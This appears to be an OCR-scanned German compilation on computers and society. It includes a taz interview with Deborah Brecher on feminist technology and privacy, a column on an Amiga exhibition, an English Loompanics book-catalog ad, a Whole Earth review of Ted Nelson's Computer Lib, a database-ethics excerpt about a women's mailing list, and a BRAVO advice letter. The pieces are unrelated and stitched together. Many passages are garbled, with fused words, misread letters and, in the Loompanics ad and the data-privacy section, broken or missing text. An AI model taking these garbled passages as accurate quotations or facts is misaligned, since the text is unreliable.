in die Büros, wobei eine Frau den ersten Entwurf 
tippt, eineanderedie Korrekturen macht etc., sodaß 
sie nie ein Endprodukt sehen und sagen können; das 
habe ich fertiggestellt. 

Du hältst es für wichtig, daß sich mehr Frauen als 
'■bisher mit der Computertechnologie beschäftigen, 


weil „das neue elektronische Zeitalterauch die weib¬ 
liche Sensibilität reflektieren muß“. Kannst Du 
Deine Vorstellung von weiblicher Einmischung und 
deren Folgen etwas verdeutlichen ? 

Die eine Frage ist die der femininen Sensibilität 
und die andere ist für viele Frauen einfach die Frage: 
Wie kriege ich einen J ob? In den US A ist es schon so, 
daß du ohne Computerkenntnisse aus dem Rennen 
bist. Da gibt es zwei Gruppen. Kannst du mit dem 
Computer arbeiten, stehen dir die Türen offen, 
kannst du es nicht, gibt es flir dich die niedrigen ma¬ 
nuellen Arbeiten. Für viele Frauen ist es sehr wich¬ 
tig, die Wahl zu haben, einen einigermaßen guten 
Job zu bekommen. Zum anderen Teil der Frage. Da 
gibt es eine bestimmte Art von Leuten, die keine an¬ 
deren Beziehungen in ihrem Leben außer der zu ih¬ 
rem Computer haben. Ich nenne sie Nurds, und ich 
habe noch nie einen weiblichen Nurd getroffen. Ich 
denke, daß Frauendem realen Leben mehr verhaftet 
sind, und das rührtdaher, daß Frauen, Mütter, Töch¬ 
ter, Schwestern sind. In den USA ist das Verhältnis 
der Töchter zu den Eltern anders als das des Sohnes 
zu ihnen. F rauen kümmern sich mehr um ihre Bezie¬ 
hungen. Es gibt auch Männer, die sich .unterstüt¬ 
zend, um Leben bemüht, verhalten, aber das sind 
dann meist „softmen“, die auch nicht viel mit Tech¬ 
nologiezutunhabenwollen. Natürlichsindnichtalle 
Männer in der Computerbranche Nurds. Aber es ist 
bemerkenswert, daß man keine Frau findet, die sich 
total abkoppelt und als Primärbeziehung den Com¬ 
puterhat. Ich bin froh, wenn mehr Frauen und diese 
andere Sorte Männer in diese Industrie gehen, und 
umgekehrt habe ich Angst bei der Vorstellung, daß 
all die Technologie von Leuten geschaffen und ein¬ 
gesetzt wird, die Maschinen so sehr lieben. 

Du schreibst, daß Du eine „feministische Auffas- 
sungvon Technik“vertrittst. WasheißtdasfiirDich, 
und wie könnte die sich in der Computertechnologie 
niederschlagen? 

Wenn du ein System entwirfst, ob es sich nun um 
Computer oder eine andere Technologie handelt, ist 
es wichtig, nicht nur ein Einzelteil zu sehen, sondern 
sich das ganze System erst vorzustellen. Es wird im¬ 
mer nur geguckt, welche Aufgabe der Computer er¬ 
füllen soll, und nicht auf die Person geachtet, die mit 


ihm arbeitet. Ein weiterer Aspekt feministischen 
Denkens ist, daß die Beziehung der Person zum Sy¬ 
stem miteinbezogen wird. Ein System sollte so ent¬ 
worfen sein, daß es einfach ist, es dahingehend zu 
verändern, daß es der Person dient und nicht umge¬ 
kehrt. 

Du sprichst jetzt von der Person und dem Compu¬ 
ter. Es betrifftja noch ein paarandereLeuie. Du ver¬ 
weist in Deinem Buch auf die Gefahr der Orwell- 
schen „Big-Brother-Gesellschaft“: MitderEinmi- 
schungvon Frauen wäreesein Geschwisterpärchen, 
das uns überwacht. Ist Dir bei diesem Gedanken be¬ 
haglicher, oderhälstDu Frauen persefür die besse¬ 
ren Menschen, die die Realisierung dieser Horrorvi¬ 
sion verunmöglichen ? 

Oh nein, ich unterteile Leute nicht in sch warz und 
weiß, gut und schlecht. Wenn ich vonden Benutzern 
des Systems spreche, meine ich das ganze Gebilde, 
d .h. ein System, das Informationen über Leute spei¬ 
chert und die gespeicherten Leute selbst sind beide 
Teil des Systems. Deshalb sollten die Rechte der 
Menschen respektiert werden. Ein weiterer Aspekt 
feministischer Technologie: Wenn du Informatio¬ 
nen über Leute sammelst, müssen deren Rechte re¬ 
spektiert werden. Ich denke, es sollte Gesetz sein, 
daß, wenn jemand über mich Informationen sam¬ 
melt, solltediesePersonmireineMitteilungmachen 
und eine Kopie der Informationen zusenden müssen. 
Ich sollte das Recht haben, sie zu kennen und zu än¬ 
dern. Und ich sollte das Recht haben, zu sagen: Ich 
will nicht in Deinem Computer sein. 

Ist es nicht ein bißchen blauäugig, an den Daten¬ 
schutzzuappellieren, ohneechteKontrollmechanis- 
menzuhtdzen? 

Ich denke, daß es definitiv ein Gesetz geben 
müßte. Es gibt bestimmte Gesetze in den USA. Die 
Gesetze hinken der technologischen Entwicklung 
hinterher, aber das ist eine andere Sache. Der andere 
Teil feministischenTechnologiedenkens ist der, daß 
es unmöglich ist, eine Maschine zu bauen, die nicht 
kaputt geht. Das heißt man hat die Konsequenzen ei¬ 
nes Sy stemzusammenbruchszu beachten. Wenn das 
beachtet würde, wäre nicht ein Nuklearreaktor 60 
Kilometer entfernt von Manhattan gebaut worden, 
wo an einem normalen Arbeitstag 20 Millionen 


Menschensind. Das isttypischNurd, etwas ohnehin 
problematisches zu machen, und es dann auch noch 
downtown aufzubauen. Das ist ein Denken, das 
Menschen nicht einbezieht. Desgleichen gibt es be¬ 
stimmte Datenbanken, dienichteingerichtet werden 
sollten, bestimmte Informationen, die nicht im Ver¬ 
bund sein sollten, weil das System definitiv kaputt¬ 
gehen wird, d.h. jemand bekommt Informationen, 
die er nicht haben sollte. Wenn alle Systeme irgend¬ 
wann zusammenbrechen, ist es angebracht zu über¬ 
legen: Kann ich das Risikoeingehen, das sich aus den 
Konsequenzen ergibt? Du planst den Zusammen¬ 
bruch in deinen Entwurf ein, und ich bin sicher, daß 
einige Informationssysteme zwar möglich sind, 
aber nicht gebaut werden sollten.(...) 

Deswegen habe ich das Buch geschrieben, mit 
dem Gedanken, daß wir die Technologensprache 
besser verstehen. Wir alle sollten diese Sprache ler¬ 
nen, um politisch wirksam arbeiten zu können. 

Das Interviewföhrte Christine Engel 



Deborah L. Brecher Foio:taz-Archiv 





selbst machen könnte, ist letztlich 
nur ein Verrichter verschiedener 
Tätigkeiten. 

Anriga 

Vor ein paar Woehen war ich auf 
einer Computerausstellung in 
Berlin. Da ieh keine Ahnung von 
Computemhabe, wußte ich nicht, 
um was es sich bei dieser Ausstel¬ 
lung handelte. 

Die fremde Welt teilte sich 
schon beim Eintritt mit. Geht man 
auf eine Ausstellung und sagt, daß 
man keine Ahnung hat? Die Jup- 
pies an der Kasse sind freundlich. 
Schließlich bin ich eine Frau, mir 
wird zugestanden, keine Ahnung 
zu haben. Eine andereorganisato- 
rische Mitarbeiterin dort hat auch 
keine Ahnung, sie hat aber auch 
keine Zeit, mich herumzuführen. 
Wir befinden uns in den „Festsä¬ 
len“ im Berliner Arbeitemertel 
Neukölln. Hier werden sonst Po- 
litveranstaltungen von den Kom¬ 
munisten gemacht. Der Festsaal 
sieht ziemlich heruntergekom¬ 
men aus, ocker-schäbig mit gel¬ 
bem Lichtund armen Leuten. Hier 
also das Neueste und Wunderbar¬ 
ste, was es angeblich auf dem 
Computer-Markt gibt, „Amiga“ 
(die Freundin) heißt die Wunder¬ 
maschine. Ist es Absicht oder Zu¬ 
fall , daß die glänzende teure Welt 
der Computerästhetik mit ihren 
vielen Informationsmappen mit 
kleinen Geschenken, die genauso 
glänzen, und dem ganzen eier- 
schalfarbenen Gerät hier über¬ 
haupt nicht zur Geltung kommt? 
Eine freundliche Dame von der 
veranstaltenden Firma Technic- 
Support in Berlin, versucht mirein 
paarDinezu erklären. Mindestens 
dreihundert Leute stehen neugie¬ 
rig gebeugt vor den Geräten. Män¬ 
ner, Väter und Söhne, mit merk¬ 
würdig symbiotischem Gesichts¬ 
ausdruck. Und die meisten haben 
ausgebeulte Hosen und unter Ga¬ 
rantie keine vollen Portemonaies. 
Das Neue und Bahnbrechende an 
„Amiga“, er (sie?) ist seit rund 
zwei Jahren auf demMarkt, istdie 
Möglichkeit Textund Büd per Vi¬ 
deokamera miteinander zu vermi¬ 
schen und das mit einem er¬ 
schwinglichen Computer. Man 
hat eine „Maus“ in der Hand und 
malt direkt auf den Computer. 


Mich als Laien, beeindruckt das 
gar nicht so sehr, weil ich sowieso 
davon ausgehe, daß man mit Com¬ 
putern alles möglich machen 
kann. „Amiga“ gebe Einblick in 
eine ganz neue „Computerphilo¬ 
sophie“. Lobend wird hervorge¬ 
hoben, daß man mit „aufgerüste¬ 
tem“ Amiga ganze Bilder zerstük- 
keln, und wieder neu zusammeh- 
setzen kan n. Bunt! Man zeichnet 
nicht mehr, sondern man nimmt 
einen kleiiwn Ausschnitt auf den 
Monitor, macht ihn groß und 
drückt ihn irgendwo drauf, so daß 
lauter kleine Kästchen in blau', in 
verschiedenen Blaus, mal eine 
Reihe so, mal eine Reihe so, mal 
bißchen weiß, noch drei Kästchen 
hoch und wieder zu rück, und zwei 
halbe rosa Kästchen, zum Rand 
hin dunkler rosa, ich komme gar 
nicht so schnell mit, und fertig ist 
das blaue Auge. „Amiga“ ist et¬ 
was fürs Grafikgewerbe. Mit 
Amiga kann man Filme machen, 
Trickfilme. Mit zitternden Hän¬ 
den, weichen Knien blättere ich 
die ganzen Geschenke noch im 
Auto durch, Werbegeschenke, 
weiß ich ja. Trotzdem eine Com¬ 
puterzeitung, ein Buch zur Soft¬ 
ware. Unverständlich -r nicht 
kompatibel — außer einer gewis¬ 
sen „Umrüstung“. 

Ein Computer wie der oben be¬ 
schriebene fördert den Perfektio¬ 
nismus und den Größenwahn. 
Man kann alles kaputt machen, 
verändern und wieder ganz ma¬ 
chen. Die Realität nach eigenem 
Gutdünken verändern, das lockt 
Allmachtsgefühle hervor, ist 
schädlich für labile Menschen. 
Nicht alle sind labil, und warum 
sollen nicht auch Frauen ihre All- 
machtphantasien an einer Ma¬ 
schine wiedieserüben? Gleichheit 
für Allmacht! 

Zum Schluß noch ein Zusam¬ 
menhang: „Es gibt in der Natur 
keine isollierten Bausteine, wie es 
nochNewtondachte,sonbdemdie 
Natur ist ein kompliziertes Netz¬ 
werk von Zusaimnenhängen zwi¬ 
schen verschiedenen Strukturen, 
die ein Ganzes bilden“, sagt Frit¬ 
jof Capra , und das eher moralische 
Ganzheitsbemühen der New Age- 
Bewegung mitderstarken Abkehr 
von richtig oder falsch trifft haar¬ 
genau auf die Brutalität und Zer¬ 
stückelungsfähigkeiten der Com¬ 
puterlogik.- 



Mil freundlicher Genehmigung der "taz” entnommen 





— 



Loompanics' 

Giealesl 

Hits 








RttUles fr Features 
(eom 

Ulli; »lüS'r 
BOOK CATALOG 
IX Tllli; WOKLI) 



—- 



. 


LOOMPANICS- GREATEST HITS 
The Collected Articles, Interviews and Features 
from 

The Best Book Catalog in the World 

Heresy, Contra-Orthoöoxy, Survival, Self-Reliance t ifo 
Extension, Privacy, TaxAvoision. ... The Loompanics Unli’mUBrt 
Book Catalog has iong beenan indispensible Information so 
for independent-living, independent-thinking people LibarVt 
Yourselt First! is the Loompanics philosophy - a self-reliarit vi«w 
often expanded upon in the articles, Interviews and features t 
we provide between the pages and pages of self-reliance 
that tili our Main Catalog. oooks 

Many of our customers have inquired about the availabilitv r.« 
these articles and features, run in past editions ot The Beel J 
Catalog In the World and its Supplements. Now we hnu 
collected ALL of these thought-provoking features into on« Ki 
book! ” 

What kind of material Can you find in this compendium of 
counter-culture cogitation? Just get a load of this: ^ 

Interviews: 

Barry Reid on Fake ID * Brad Steiner on Seif Defense * 
Michael Kuzma on Mail Drops * Kurt Saxon on Sur^^v^ 

* Carl Dorski on Crime * R.W. Bradford on Financia 
Privacy vr Eddie the Wire on Locks *M. Harry ön 
nvestigative Reporting * Michael Marotta on Codes w a 

Black MaTke^^’^' 

Articles; 

Personal Strategies for Liberty ★ Finding a Mate * Death & 
Taxes. Gordon Kahl and the IBS ★ Using Money Orders to 
Protect Your Financial Privacy ★Gun Control as Class 

Mh h'® * National Defensl * 

Libertanan Warfare for Fun & Profit ★ m Praisl of 
Vengeanpe * The Reasons Behind Abundance & Scarci^ 

RevoTuhona^ WaT 'ndependence and th^ 

Features; 

Squalting on Public Land + Situationist Comics * Findinn 

Morer^'^^ *Aphorisms of a Pessimist * And 

The articles, Interviews and features are arranaeri hv to ■ 
the following sections; * Breaking Free * Taxes * Phvacv w'S 
Defense ♦ War & Survival * Crime and Punishment * 
Features. All m all, an amazing collection of Creative 
fjracfical advice, and just plain fun! '«eas, 

Some of the most provocative and outrageous artioio 
ideas of recent years! En/oy! “Ueous articles and 

Large 8% X 11, 80 pp, aoflcover 
LOOMPANICS’ GREATEST HITS 





Computer Lib/Dream Machines 


i'lWOFi 



Computer Lib/Dream Machines 

Ted Nelson started the entire genre of mainstream Com¬ 
puter books in 19/4 with a Whola Earth Cafalog-sized 
polemic calied Computer Lib/Dream Machines. Like 
an Ac'e pulp Science-fiction novel, it came in two halves, 
bound upside-down together. The "Lib" side was ä tourist 
guide to available Computers and the corporate politics 
behind them; the "Dream" side showed us evanescent 
innovations that (Nelson knew) would reshape everyone's 
lives. (One of these nascent innovations was "Hyper- 
text" — in which text or pictures contain "links," or 
passages tbrough which people con melaphorically leap 
to other information important to them. Nelson is the 
most prominent popularizer of tbis idea, which he has 
devoted much of his working life to developing, and 
which is now itself linked with various suddenly promi¬ 
nent programs like HyperCard and the forthcoming 
Lotus Agenda.) 

Now Nelson has voraciously updated both halves of his 
old book. The formal is (abit too much) old stuff updated 
copiously with brilllant new stuff. Amidst viciously well- 
targeted assessments af machines, metaphors, and man- 
ufacturers, you will he guided through hacker in-jokes 
and skilIed pithy Judgements. Nelson is sometimes justly 
criticized for quirkiness and self-indulgence; but he has 
an innate ability to judge the significance of particular 
technologies, shared by few other writers. He has, in this 
edition, also recreated what was then and is still the 
most fun-to-read Computer book of all time. 

—Art Kleiner 


Thepmblem 

isiiot 

Software 

“f«encf//ness." 

conceptual 
clarity;/) 
globedoes 
notsay. 
“good 
morning.“ ft 
is simple 
and clear 
not 

‘friendly." 


rrsALL 

COMPUTERS 

Somewhere 
Inside almost 
every object, 
these days, is 
a IlWe Pro¬ 
fessor. 
Elevators, 
dank ma¬ 
chines, gas 
pumps, the 
jammed cash 
register that 
Just happens 
to be hotding 
up vour 
llne—all 
have pecu- 
llaritles 
hased on 
howsome 
programmer 
thought 
aboot the 
Problem. 


Compurer Lib/ 
Dream Machines 

Ted Nelson 
1987; 330 pp. 

$18.95 

($20.95 postpaid) from: 
Microsoft Press 
Attn.; Consumer Sales 
16011 36thWay/Box 97017 
Redmond, WA 98073-9717 
800/426-9400 
or Whole Earth Access 






—— 


Release 1.0 

The most literale and informed writ- 
ing on the technology of thinking 
comes on the groy, typewritten pages 
of this very expansive newsletter. For 
many ofits subscribers, il's an unbe- 
lievabte bargain. Inslead of tramping 
to the Computer industry's most tan- 
talizing Conferences, they can read 
Esther Dyson's personable reports, 
and soak up more than they would 
by being Ihere. Dyson deciphers 
esoteric lechnical issues into oh-l- 
get-itl language, further refined by 
an impenetrable filier against PR 
hype. Moreover, she has an unerring 
nose for the significant consequence. 
Talk a library into subscribing. 

—Kevin Kelly 

My favorite Computer read is Re¬ 
lease 1.0, a pricey monthly from 


NON-Ö>nfV]t€(l 
Yl€J^) Of W Vlo(i.L> 


tWi, 




The ALL-PURPOSE Machine 
Computers are COMPLETELY GENERAL, with no fixed 
purpose or style of Operation. In spite of this, the stränge 
myth has evolved that Computers ore somehow "moth- 
ematical." 

Actually von Neumann, who got the general ideo about 
OS soon OS onybody (1940s), calied the Computer 
THE ALL-PURPOSE MACHINE, 

(Indeed, the first backer of Computers öfter World War II 
was o moker of multi-lightbulb signs. It is an interesting 
possibility that if he hod not been kilied in an oirplone 
crosh, Computers would hove been seen first os text- 
handling and picture-taking machines, and only later 
developed for mathematics and business.) 

We would call it the All-Purpose Machine here, except 
that. for historical reasons it has been slapped with the 
other name. 

But that doesn't mean it has a fixed way of operating. 

On the contrary. 

COMPUTERS HAVE NO NATURE AND NO CHARAaER, 

save that which has been put into them by whoever is 
creating the program for o particular purpose. Com¬ 
puters ore, unlike any other piece of equipment, perfectly 
BLANK. And that is how we have projected on it so 
many different faces. 




TV. 


My Position on television is that television is 
movies that follow a slotted schedule . The 
time-slat decrees the nature of television just 
as surely as the time slot decrees the nature of 
schooling in our current System. 


PUBLIC REPOSITORY SYSTEM 
WITH PLURALISTIC RE-USE, 

publlcxtioa by users 


PRiyXTt PUBLIC 
DOCUMDTTS documdits 


PUBLIC PPIVATt 
UNKS UKCS 




UNIFIEO TISSIIEOFSTOXACE. EYES-EIPANDlWa 
Cmu.» OlrreHEHT STORAOE STATIOB 




From uisraryMactiines 87 . 1 . 










EINE DATENBANK - ETHIK 
EIN POSITIVES 
FEMINISTISCHES MODELL 


Gravierende Probleme ergeben sich aus Datenbankanwendungen wie 
Auskunfteien. Es gibt bereits Unternehmen, die gegen Bezahlung ein 
Dossier zu Ihrer Person anlegen. Uber ihre an ein Modem ane^^hlosse- 
nen Computer durchsuchen sie zahlreiche offenüich zugängliche Dat 
banken. In den Volkszählungsunlerlagen sind Angaben über das du 
schnittliche Jahreseinkommen enthalten. Die f’ 

Grundbucheintragungen und andere harmlos anmutende 
können Rückschlüsse auf Ihre Kreditwürdigkeit zulassen. Es kann also 

ein umfassendes Bild von Ihrer Person erstellt werden. 

Ein beängstigender und wenig beachteter Eingriff in Pnyatsphare 
ist dadurch gegeben, daß viele Vereine, Unternehmen und Ze^^^^nften 
ihre AdressListen ohne die Erlaubnis ihrer Mitglieder Abonnenten 
oder Kunden verkaufen. Auskunfteien und sogar Behörden ^ 

Listen erwerben. Welche Zeitschriften Sie lesen, sagt sehr viel über Ihr 
politische Gesinnung aus. Auch Geschäfte, in denen Sie einkaufen as- 
^n Rückschlüsse auf Ihre Lebenshaltung zu. Das Ernannt m den USA 
kommt mit Hilfe dieses Verfahrens Personen auf die Schliche, die keine 
Steuern zahlen (Für Personen, die ihr Einkommen anseton 

wurde diese Methode bisher noch mcht verwendet). Es wjden Adre 
senlisten von eleganten und teuren Zeitschriften gekauft. Mit Hi fe von 
Computern werden daraufhin die Namen überprüft um festzustellen ob 
die angeblich wohlhabenden Abonnenten auch Emkommensteuererkla- 

^oir.Bi'g^ Brother«-Gesellschaft Orwells ist auf unbehagliche Weise 
näher gerückt. Es gibt leider keine Gesetze, die den Handel mit Infor¬ 
mationen regeln. In einigen Branchen, etwa 
glücklicherweise Regelungen. Im 

maüonen kaufen und verkaufen. Es gibt zwar in den USA den Fre^orn 
of Information Act, der den Bürgern jedoch nur das Recht emraumt zu 
erfahren, welche Informauonen eine Behörde über sie gespeichen ha . 
Es wird hingegen keineswegs geregelt, welche Informaüonen ein Pnva - 
unternehmen oder eine Behörde über eine Einzelperson speichen, oder 

irgendwelche Schreckensgeschichien berichte, die 
ihm im Zusammenhang mit gespeicherten Informationen wide^ren 
sind. Falsche Daten, die sich in eine Datei eingeschlichen haben, können 
Sie regelrecht verfolgen. Es kann passieren, daß Sie für kreditunwur- 
dig erUärt werden, die Überweisung einer Kaufhausrechnung verspätet 
ankommt oder Sie einen bereits bezahlten Strafzettel noch emm^ zahl n 
sollen. Aufgrund der sich aus falschen Informationen ergebenden Pro¬ 
bleme unterliegen die Banken gesetzlichen Regelungen.^ In tot allen 
Staaten der USA sind Sie befugt, jederzeit Einsicht in die über Sie ange¬ 
legte Bankakte zu nehmen. Wenn Ihnen ein Kredit verweigert wurde, 
muß Ihnen die Bank kostenlos eine Kopie Ihrer Akte zustellen; ansonsten 
müssen Sie hierfür bezahlen. Aber was ist mit all den anderen Akten, 
die über Sie angelegt wurden? 


eben hat. In diesem Fall würden nur wenige von ihrem Recht Gebrauch 
machen und Fehler in den Dateien sowie falsche Informationen meistens 
unentdeckt bleiben (wie würde man überhaupt von der Existenz der ge¬ 
speicherten Daten erfahren?). 


Eine Datenbank-Ethik — 

ein positives (feministisches) Modell 

Nachdem ich Sie vor den schlimmsten Folgen des Mißbrauchs von 
Computer-Datenbanken gewarnt habe, möchte ich eine interessante 
Möglichkeit aufzeigen, wie eine Datenbank unter Einbeziehung mora¬ 
lischer Gesichtspunkte konzipiert sein kann. 

Die Einrichtung von Datennetzen gehört zu den positiven neuen Mög¬ 
lichkeiten. die sich durch die Nutzung von Datenbanken ergeben. 1981 
machte ich eine interessante Beobachtung, ln den USA gab es zahlreiche 
Fraueninitiativen, die daran gescheitert waren, daß zu wenig Leute von 
ihrer Existenz wußten. Ihre Aktivitäten waren dringend notwendig; sie 
umfaßten die Bereiche Frauenhäuser, Krisenintervention bei Vergewal¬ 
tigungen, Rechtshilfe für besondere Frauengruppen, zum Beispiel Ge¬ 
schäftsfrauen, alte Frauen und Frauen aus Minderheiten; ferner auch 
Beiträge zur Frauenkulmr, wie Kleinverlage für Frauenbücher und Pro¬ 
duktion von Kunst, Musik, Theater und Film von Frauen. Leider fehlte 
selbst den erfolgreichsten Initiativen das Geld, um sich in der Presse oder 
im Radio, ganz zu schweigen vom Fernsehen, Werbung leisten zu kön¬ 
nen. Daher blieben ihre Aktivitäten den Frauen, die sie ansprechen woll¬ 
ten, weitgehend unbekannt. Andererseits hatten Frauen, die Kontakt zu 
diesen Initiativen suchten, keine Möglichkeit, sie zu finden. 

Als Unterstützung für diese Gruppen richtete ich unter dem Namen 
The National Women ’s Mailing List (Landesweites Anschriftenverzeich¬ 
nis für Frauen) eine elektronische Datenbank ein. Dieses vemetzbare 
Anschriftenverzeichnis sollte als Beispiel für eine elektronische Daten- 
baiüc dienen, in der Informationen über Personen nach feministischen 
(moralischen) Prinzipien gespeichert sind. 

Ich bezeichne diese Prinzipien nicht deswegen als feministisch, weil 
sie auf Frauen beschränkt sind, sondern weil sie am eindringlichsten von 
Frauen artikuliert wurden, die sich als Feministinnen mit diesem Thema 
auseinandergesetzi hatten (zum Beispiel Judy Smith vom Hb/rien and 
Appropriate Technology Network und Corky Bush von der American 
Association of University Women. Im einzelnen handelt es sich um fol¬ 
gende Prinzipien; 

• Anerkennung der Rechte der Einzelnen 

• Die Beteiligten haben die Kontrolle über das System 

• Die Anwender sind an der Gestaltung des Systems beteiligt 

• Im voraus erkennen, was die Folgen eines Systemausfells sind. 

Und dieser Ausfall kommt unvermeidlich\ 


Ein bescheidener Vorschlag 

Ich persönlich plädiere für die Auflage, daß jedes Unternehmen und jede 
Behörde, die Daten über Sie gespeichert hat, Ihnen jedes Jahr eine Kopie 
derselben zuschicken muß. Die Daten befinden sich bereits un Computer 
und können daher ohne großen Aufwand ausgedruckt und toen zur Ver¬ 
fügung gestellt werden. Bei Banken ist dies bereits üblich, fe «gdma- 
ßigen ALtänden erhalten Sie Kontoauszüge, so daß Sie die Korrektheit 
der Bankabrechnungen nachprüfen können. Warum sollte ein nra - 
unternehmen, das sein Geld mit Informationen über Sie verdient, nicht 
dasselbe tun? Die damit verbundenen Belastungen dürfen dlerdings 
S den einzelnen Personen aufgebürdet werden. Sie 
eezwungen sein. Ihre Zeit und Mühe darauf zu verwenden, bei jedem^ 

Unternehmen Ihre Akte anzufordem, das Informationen u r legespei 


Das Anschriftenverzeichnis für Frauen 

Ich möchte anhand der National Women’s Mailing Ust erklären, was 
diese Prinzipien in der Praxis bedeuten. Die meisten elektronisch gespei¬ 
cherten Anschriftenlisten werden einfach dadurch geschaffen, daß Per- 
sonenverzeichnisse gekauft und fe einer Datenbank zusammengefeßt 
werden. Die Betroffenen wissen nichts davon und werden auch nicht 
um ihre Zustimmung gebeten. Unser Anschriftenverzeichnis dagegen 
beruht auf Freiwilligkeit. Um aufgenommen zu werden, müssen Sfe ein 
spezielles Erfassungsformular unterzeichnen, sei es als Einzelperson 
oder als Frauenorganisation. 

Das Erfassungsformular ist in zahlreiche Felder aufgegliedert. Hier 
können die Teilnehmerinnen Angaben über Alter, Beruf, ethnische Zu¬ 
gehörigkeit, Familienstand machen oder den Zweck ihrer Organisation 
beschreiben. Jede Frau gibt an, zu welchen Themenbereichen sie Infor- 



mationen erhalten möchte. Dazu steht ein breites Feld an Frauenthemen 
zur Auswahl. Jeder Themenbereich im Datenbanksystem ist einem sepa¬ 
raten Feld zugeordnet. Das eingeschickte Formular wird als Datensatz 
in die Datei eingegeben. 

Mit Hilfe der Selektionsmöglichkeiten des Datenbankprogramms las¬ 
sen sich für eine Vielzahl von Frauenorganisationen und Themen kun¬ 
denspezifische Listen anlegen. Zu diesem Zweck genügt es anzugeben, 
welche Felder durchsucht werden sollen. Zum Beispiel körmen wir den 
Computer anweisen, die 60.000 Datensätze der Hauptdatei durchzuse¬ 
hen und alle Personen anzugeben, die Interesse an Frauenliteratur haben. 
Feministische Verlage können dann diesem Personenkreis ihre Buchan¬ 
kündigungen zuschicken. Es lassen sich auch mehrere Felder kombinie¬ 
ren. Wir köimen zum Beispiel diejenigen herausfiltem, die sich für Frau¬ 
enliteratur interessieren und in Chicago wohnen. Dieser Personenkreis 
kann dann über Autorenlesungen in Chicagos Frauenbuchhandlungen 
informiert werden. Wenn ein Buch den Themenkreis ältere Frauen be¬ 
handelt, lassen sich alle Personen auffinden, die sich für Frauenliteratur 
interessieren, in Chicago leben und über 50 Jahre alt sind. Handelt cs 
sich um ein Lehrbuch, so könnten alle Pädagoginnen unter diesen Frauen 
angesprochen werden. Eine Datenbank kann somit die verschiedensten 
Anforderungen erfüllen, je nachdem, wie die Suchbedingungen definiert 
wurden. 

Die Aufnahme in die National Women’s Mailing List ist nicht nur 
freiwillig, sondern es werden auch die Wünsche der Teilnehmerinnen 
respektiert. Es können Frauen mit den verschiedensten Interessen in die 
Datenbank aufgenommen werden. Sie können sicher sein, daß sie nur zu 
den von ihnen gewählten Themen Informationen erhalten. Eine Frau, die 
angegeben hat, daß sie sich nur für Fragen der Frauengesundheit interes¬ 
siert, wird nie in einer Adressenliste auftauchen, in der Personen mit 
Interesse am Frauensport zusammengefaflt sind. In ihrem Datensatz 
ist das Feld für Sport freigelassen. Daher ist ausgeschlossen, daß ihr 
Name auf einer Liste erscheint, die für die Konferenz über Frauen- 
Leichtathletik bestellt wurde. Da der Computer den Anweisungen blind 
gehorcht, überspringt er ihren Namen, ohne ihn in die Unterdatei auf¬ 
zunehmen. Unser Computer kommt voll und ganz den Wünschen der 
einzelnen Teilnehmerinnen entgegen, und diese müssen sich nicht den 
Vorgaben des Systems unterordnen. 

Das Erfassungsformular 

Die Verwendbarkeit einer Datenbank hängt einzig davon ab, wieviele 
Felder für Informationen vorgesehen sind. Unser Erfassungsformular 
muß daher so umfassend wie möglich sein. Alle wichtigen Interessenge¬ 
biete, über die Frauen möglicherweise informiert werden möchten, müs¬ 
sen angegeben sein. Zunächst erstellten wir selbst ein Verzeichnis. Doch 
bald erkannten wir, daß es nicht vollständig war. Um die Lücken zu fül¬ 
len, fügten wir unter der Überschrift »Weiteres« am Ende jeder Theraen- 
gruppe einige FreizeUen ein. Die Antworten wurden sorgfältig ausge¬ 
wertet und unser anfänglicher Entwurf auf diese Weise um mehr als 20 
Kategorien erweitert. Durch die Möglichkeit der Beteiligten, Einfluß auf 
die Gestaltung des Systems zu nehmen, wurden die Anwendungsmög¬ 
lichkeiten der Datenbank zum Vorteil aller erweitert. 

Mit Hilfe des Computers läßt sich der Aufbau der Datensätze relativ 
leicht um neue Felder erweitern. Die Altmitglieder haben natürlich 
Leerstellen anstelle der neuen Felder. Doch vom Zeitpunkt der Neuorga¬ 
nisation an werden für die Zukunft auch die neuen Daten gesammelt. 
Dieses Verfahren ist nicht mit dem Bild des allwissenden System-Gestal¬ 
ters vereinbar, Doch jedes gute System sollte für zukünftige Veränderun¬ 
gen offen sein. 

Es ist uns wohl bewußt, daß wir nicht jedes für Frauen interessante 
Gebiet erfassen köimen. Wir erfüllen die Rolle von Informations-Mana¬ 
gerinnen oder Datenbank-Biblioüiekarinnen. Unsere Aufgabe besteht 
darin, den Datensatzaufbau im Computer den Bedürfnissen anzupassen. 
Dieses Verfehren hat den zusätzlichen Vorteil, mit einem »lebenden« 
System zu arbeiten und auf sich ändernde soziale Bedingungen eingehen 
zu können. Zum Beispiel war Stop der Atomenergie beim Aufbau des 
Systems noch kein Thema. Nachdem wiederholt Interesse daran bekun¬ 
det wurde, haben wir es unter die vorhandenen Interessengebiete aufge¬ 
nommen. 


STECKBRIEFE zum Sammeln! 

Ausschneiden, in der Mitte falten und hinten zusammenkleben 


BRAVO-Steckbrief 


Unser Bruder hockt 
ständig vorm Computer 


Wir haben ein großes, Problem. 
Unser kleiner Bmder (14 A) Ist ein 
fanatischer Computer-Freak. Er 
sitzt den ganzen Tag nur vor seinem 
Gerät. 

Wenn wir ihn ansprechen, antwor¬ 
tet er nur mit Faohbegritfen aus der 
Computer-Fachsprache. Wie brin¬ 
gen wir ihn dazu, weniger vor die¬ 
sem Ding zu hocken? 

Er Ist nämlich in der Schule auch 
schon drastisch abgesackt. Was 
können wir unternehmen? 

Sigrid und Evelyne, 16, Mosbach 

Dr.-Sommer-Team: Eure 
Ablehnung macht ihn nur 
noch störrischer 

Euer Bruder ist begeistert vom 
Computer, deshalb werdet Ihr es ver¬ 
mutlich schwer haben, ihn völlig von 
ihm abzubringen. Und daß er seine 
Beschäftigung mit ihm einschränken 
bzw. sich vernünftig mit Euch unter¬ 
halten soll, wird er sicher ebenfalls 
nur unter Protest akzeptieren. 


Meist läßt die Begeisterung für 
eine neue Sache mit der Zeit von 
alleine etwas nach. Da sich sein neues 
Hobby allerdings bereits aut die 
Schulleistungen negativ auswirkt, 
solltet Ihr mit Euren Eltern gemein¬ 
sam überlegen, ob der Computerge¬ 
brauch nicht etwas eingeschränkt 
werden soll oder er nur mit dem 
Gerät arbeitet, wenn die Hausaufga¬ 
ben gemacht worden sind. 

Sicher werdet Ihr ihn auch leichter 
beeinflussen können, wenn Ihr Euch 
nicht nur kritisch und ablehnend ge¬ 
genüber seinem Hobby äußert, son¬ 
dern Euch im Gegenteil selbst etwas 
mehr dafür interessiert. 

Dann wird er bestimmt zugängli¬ 
cher auch für Kritik und fühlt sich 
nicht völlig ins Unrecht gesetzt. Mit 
